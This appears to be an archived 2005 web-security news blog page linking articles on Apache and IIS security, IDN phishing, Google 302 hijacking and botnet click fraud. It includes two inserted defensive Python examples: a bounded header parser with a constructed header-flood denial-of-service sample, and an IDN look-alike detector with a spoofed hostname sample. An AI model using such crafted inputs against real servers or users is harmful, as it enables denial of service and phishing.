Article Link: http://www.theregister.co.uk/2005/03/17/google_x_files_disappear/
Link: Got news? Submit it!
03/15/2005 Google 302 redirection trick
I found an interesting article on Google this morning regarding some tricks that you can do to make your site rank higher on Google.

Article Link: http://clsc.net/research/google-302-page-hijack.htm
Link: Got news? Submit it!
03/13/2005 External Web Application Protection: Impedance Mismatch
Ivan from modsecurity had an interesting post about some of the challenges he faces when developing mod_security. Be sure to also check out his "Where Do Web Application Firewalls Fit in the Overall Defense Strategy?" posting.

"Web application firewalls have a difficult job trying to make sense of data that passes by, without any knowledge of the application and its business logic. The protection they provide comes from having an independent layer of security on the outside. Because data validation is done twice, security can be increased without having to touch the application. In some cases, however, the fact that everything is done twice brings problems. Problems can arise in the areas where the communication protocols are not well specified, or where either the device or the application do things that are not in the specification." - Ivan

Blog Link: http://www.modsecurity.org/blog/
Mod_security Link: http://www.modsecurity.org/
Link: Got news? Submit it!
03/08/2005 IIS 6.0 Security
"The popularity of web servers as a prime target for crackers and worm writers around the globe made IIS a natural place for Microsoft to focus its Trustworthy Computing Initiative. As a result, IIS has been completely redesigned to be secure by default and secure by design. This article discusses the major default configuration and design changes incorporated in IIS 6.0 to make it a more secure platform for hosting critical web applications." - Rohyt Belani and Michael Muckin

Article: http://www.securityfocus.com/infocus/1765
Link: Got news? Submit it!
03/02/2005 Apache 2 with SSL/TLS: Step-by-Step, Part 3
"This article concludes our three part series dedicated to configuring Apache 2.0 with SSL/TLS support -- for maximum security and optimal performance of SSL based e-commerce transactions.

Part one introduced key aspects of SSL/TLS and then showed how to compile, install and configure Apache 2.0. The second part discussed the configuration of mod_ssl and authentication issues, and then showed how to create web server's SSL certificate.

Now, in the third and final article, we will take a look at client authentication using client certificates, show how to chroot a secure Apache, discuss common attack vectors, and then describe some typical configuration mistakes made by administrators that will decrease the security level of SSL communications." - Artur Maj

Link: http://www.securityfocus.com/infocus/1823
Link: Got news? Submit it!
02/28/05 The Insecure Indexing Vulnerability: Attacks Against Local Search Engines
In this article Amit Klein discusses the risks associated with using a local search engine that indexes its content locally.

Link: http://www.webappsec.org/articles/
Link: Got news? Submit it!
02/24/2005 Ajax: A New Approach to Web Applications
"Google Suggest and Google Maps are two examples of a new approach to web applications that we at Adaptive Path have been calling Ajax. The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what's possible on the Web." - Jesse James Garrett

Article Link: http://www.adaptivepath.com/publications/essays/archives/000385.php
Link: Got news? Submit it!
02/20/2005 Fiddling with HTTP
A co-worker emailed me a link to an interesting Microsoft article about the tool 'Fiddler'.

"Microsoft Fiddler can help you answer these questions, and many more. Fiddler is an HTTP debugging proxy that logs all HTTP traffic between your computer and the Internet. Fiddler enables you to inspect all HTTP traffic, set breakpoints, and "fiddle" with incoming or outgoing data. Fiddler is much simpler to use than NetMon or other network debuggers because it exposes only HTTP traffic and does so in a user-friendly format.

Fiddler includes a simple but powerful Microsoft JScript .NET event-based scripting subsystem flexible enough to support a broad array of HTTP debugging tasks. Written in C# on the Microsoft .NET Framework, Fiddler is available as an unsupported PowerToy for Internet Explorer." - Microsoft

Article Link: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnwebgen/html/IE_IntroFiddler.asp

Tool Link: http://www.fiddlertool.com/fiddler/
Download Link: http://www.fiddlertool.com/Fiddler/version.asp
Link: Got news? Submit it!
02/14/2005 Update to the Frequently Asked Questions Page
I've updated the FAQ page with a bunch of questions that I get asked fairly often. This is a work in progress, so if there's a question you feel was missed, let us know. On another note, Happy Valentine's Day!

Frequently Asked Questions
Submit your questions
02/13/2005 Mod_Python updates released to fix security hole
Mod_python 2.7.11 (Apache 1.3) and 3.1.4 (Apache 2.x) have been released to address a recently discovered security vulnerability. Updated versions of mod_python can be found here
02/09/2005 "Mapping Google"
I stumbled upon this article today explaining how the new google maps service works.

"By now, many of you will have gone and tried out the new Google Maps application. By and large, you have to admit that it's pretty damned slick for a DHTML web application -- even my wife was impressed, and that's not easy with geek toys. So, in the spirit of Google Suggest and GMail, I've decided to have a quick peek under the hood to figure out what makes it tick."

Link: http://jgwebber.blogspot.com/2005/02/mapping-google.html
02/08/2005 Microsoft releases 12 security updates
Microsoft has finally released the 12 patches it promised in its last Advance Notification Bulletin. Users should beware that some people are having problems after applying the patches. It should be noted that Microsoft *finally* released a *decent patch* (not an ISAPI filter) for the recent ASP.NET Path Validation Vulnerability.

02/08/2005 Apache 2.0.53 released
"The Apache Software Foundation and The Apache HTTP Server Project are pleased to announce the release of version 2.0.53 of the Apache HTTP Server ("Apache"). This Announcement notes the significant changes in 2.0.53 as compared to 2.0.52. The Announcement is also available in German from:

http://www.apache.org/dist/httpd/Announcement2.txt.de

This version of Apache is principally a bug fix release.

This release is compatible with modules compiled for 2.0.42 and later versions. We consider this release to be the best version of Apache available and encourage users of all prior versions to upgrade.

Apache HTTP Server 2.0.53 is available for download from

http://httpd.apache.org/download.cgi

Please see the CHANGES_2.0 file, linked from the above page, for a full list of changes." - Apache

Below are snippets from the CHANGELOG

"Changes with Apache 2.0.53

*) SECURITY: CAN-2004-0942 (cve.mitre.org)
Fix for memory consumption DoS in handling of MIME folded request headers. [Joe Orton]

*) SECURITY: CAN-2004-0885 (cve.mitre.org)
mod_ssl: Fix a bug which allowed an SSLCipherSuite setting to be bypassed during an SSL renegotiation. PR 31505.
[Hartmut Keil, Joe Orton]"
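
The first of those changelog entries concerns a header field that keeps growing while folded continuation lines are joined onto it. The following is an added illustration, not Apache's code and not the actual fix: a small HTTP/1.x header parser that unfolds continuation lines but charges every fold against a per-field byte budget, so a stream of short continuation lines (each individually under any per-line limit) cannot accumulate into an unbounded field. The limits, the `HeaderTooLarge` exception and the sample requests are constructed values chosen for the example.

```python
# Added example: bounded unfolding of HTTP/1.x header fields.
# Not Apache's code; the limits below are constructed values chosen for illustration.
from __future__ import annotations

MAX_FIELD_BYTES = 8190   # budget for one logical header ("Name: value"), folds included
MAX_FIELDS = 100         # cap on the number of header fields per request


class HeaderTooLarge(Exception):
    """Raised when a header field, after unfolding, exceeds the byte budget."""


def parse_headers(raw: bytes, max_field: int = MAX_FIELD_BYTES,
                  max_fields: int = MAX_FIELDS) -> list[tuple[str, str]]:
    """Parse a CRLF-delimited header block, unfolding continuation lines.

    A continuation line starts with SP or HTAB and belongs to the preceding
    field. The byte budget is re-checked after *every* fold, so many short
    continuation lines cannot accumulate into an oversized field.
    """
    fields: list[list[bytes]] = []
    current: list[bytes] | None = None
    for line in raw.split(b"\r\n"):
        if line == b"":
            break                      # empty line terminates the header block
        if line[:1] in (b" ", b"\t"):
            if current is None:
                raise ValueError("continuation line before any header field")
            # Fold: join with a single space, then re-check the cumulative size.
            current[1] = current[1] + b" " + line.strip()
            if len(current[0]) + 2 + len(current[1]) > max_field:
                raise HeaderTooLarge(current[0].decode("ascii", "replace"))
            continue
        if len(fields) >= max_fields:
            raise ValueError("too many header fields")
        if len(line) > max_field:
            raise HeaderTooLarge(line[:40].decode("ascii", "replace"))
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError("malformed header line")
        current = [name.strip(), value.strip()]
        fields.append(current)
    return [(n.decode("latin-1"), v.decode("latin-1")) for n, v in fields]


def is_too_large(raw: bytes) -> bool:
    """True if the header block trips the per-field size budget."""
    try:
        parse_headers(raw)
    except HeaderTooLarge:
        return True
    return False


# Constructed sample input: a normally folded header, and a flood of continuation lines.
NORMAL = (b"Host: example.com\r\n"
          b"X-Long: part one\r\n"
          b" part two\r\n"
          b"\tpart three\r\n"
          b"\r\n")

FLOOD = (b"X-Fold: start\r\n"
         + (b" " + b"x" * 100 + b"\r\n") * 200   # 200 folds, each well under any line limit
         + b"\r\n")

if __name__ == "__main__":
    print(parse_headers(NORMAL))
    print("flood rejected:", is_too_large(FLOOD))
```

The point of the example is where the check sits: a parser that only bounds each physical line still lets the joined field grow by roughly one line per fold, so the limit has to apply to the logical field after each join.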

02/08/2005 "New phishing flaw affects all browsers except IE"
"jimmy@gmail.com" reports: "A new vulnerability was reported in several web browsers, which may be exploited by attackers to conduct phishing/spoofing attacks and display fake domain names. The problem resides in the IDN (International Domain Name) implementation and occurs when handling malformed URLs containing specially crafted characters, which may be exploited to spoof SSL certificates and the URL displayed in the address/status bar."

Source: http://www.k-otik.com/english/advisories/2005/0112 (K-OTik Security)
Link: Got news? Submit it!
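The advisory above concerns domains whose display form looks like a familiar name because it uses international characters. As an added defender-side check, not code from the advisory or from K-OTik, here is a small Python routine that takes a URL, converts each hostname label between its Unicode and punycode (`xn--`) forms, and flags labels that mix scripts or contain any non-ASCII character, so that a log line or proxy warning can show the unambiguous ASCII form rather than the spoofable display form. The script classification is a constructed heuristic based on Unicode character names, not a full confusables check; the sample hostnames (including a Cyrillic а standing in for Latin a) are constructed.

```python
# Added example: surface look-alike (IDN) hostnames in their punycode form.
# Constructed heuristic, not code from the advisory; not a full UTS #39 check.
import unicodedata
from urllib.parse import urlsplit

# Script families distinguished by Unicode character-name prefix.
SCRIPT_PREFIXES = ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN", "HEBREW", "ARABIC")


def script_of(ch: str) -> str:
    """Coarse script label for a letter; ASCII letters count as Latin."""
    if ch.isascii():
        return "LATIN"
    name = unicodedata.name(ch, "")
    for prefix in SCRIPT_PREFIXES:
        if name.startswith(prefix):
            return prefix
    return "OTHER"


def to_unicode_label(label: str) -> str:
    """Decode a punycode (xn--) label to Unicode; other labels are returned as-is."""
    if label.lower().startswith("xn--"):
        try:
            return label.encode("ascii").decode("idna")
        except UnicodeError:
            return label
    return label


def inspect_host(url: str) -> dict:
    """Report the Unicode and ASCII forms of a URL's host and any suspicious labels."""
    host = urlsplit(url).hostname or ""
    unicode_labels = [to_unicode_label(label) for label in host.split(".")]
    flagged = []
    for label in unicode_labels:
        scripts = {script_of(c) for c in label if c.isalpha()}
        if len(scripts) > 1:
            flagged.append((label, "mixed-script"))      # e.g. Latin p + Cyrillic а
        elif any(not c.isascii() for c in label):
            flagged.append((label, "non-ascii"))         # single script, still worth showing
    try:
        ascii_host = ".".join(label.encode("idna").decode("ascii") for label in unicode_labels)
    except UnicodeError:
        ascii_host = host                                 # label too long or otherwise invalid
    return {
        "host": host,
        "unicode_host": ".".join(unicode_labels),
        "ascii_host": ascii_host,
        "flagged": flagged,
        "suspicious": bool(flagged),
    }


if __name__ == "__main__":
    # Constructed samples: a plain ASCII host and a look-alike with a Cyrillic а (U+0430).
    for sample in ("https://www.example.com/login", "https://p\u0430ypal.com/"):
        print(inspect_host(sample))
```

The ASCII (`xn--`) form is what should reach logs and alert text: two hosts that render identically in an address bar never share a punycode form, so showing it removes the ambiguity the advisory describes.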
02/06/2005 Submit news form now available
I've found that it's difficult to track every news article, advisory, whitepaper, or press release alone so I've added a "News Submission Form" to the site. If you have a paper, article or news story you think is worthwhile please fill out our form and share your resource with the rest of us!

Link: Submit News
02/04/2005 Botnets strangle Google Adwords campaigns
I found this rather interesting article at www.theregister.co.uk that was worth posting.

"Security researchers have discovered a way to shut down or seriously impair a Google Adwords advertising campaign by artificially inflating the number of times an ad is displayed. By running searches against particular keywords from compromised hosts, attackers can cause click-through percentage rates to fall through the floor.

This, in turn, causes Google Adwords to automatically disable the affected campaign keywords and prevent ads from being displayed. By disabling campaign keywords using the technique, cybercriminals could give their preferred parties higher ad positions at reduced costs, according to click fraud prevention specialists Clickrisk." - Thereg

Link: Botnets strangle Google Adwords campaigns
02/03/2005 Security Best practice: Host Naming & URL Conventions
Gunter Ollmann has written a paper entitled "Security Best Practice: Host Naming & URL Conventions".

"A consideration often neglected by many organisations when rolling out new servers or developing web-based applications that will be accessible by Internet clients and customers is that of host and URL naming conventions. There are a number of simple steps that can be taken to strengthen the security of an environment or application, making it more resilient to several popular attack vectors. By understanding how an attacker can abuse poorly thought out naming conventions, and by instigating a few minor changes, it is possible to positively increase the defense-in-depth stature of an environment." - NGS

Interesting paper worth a read.
01/31/2005 Web Application Security Consortium "Guest Article" Released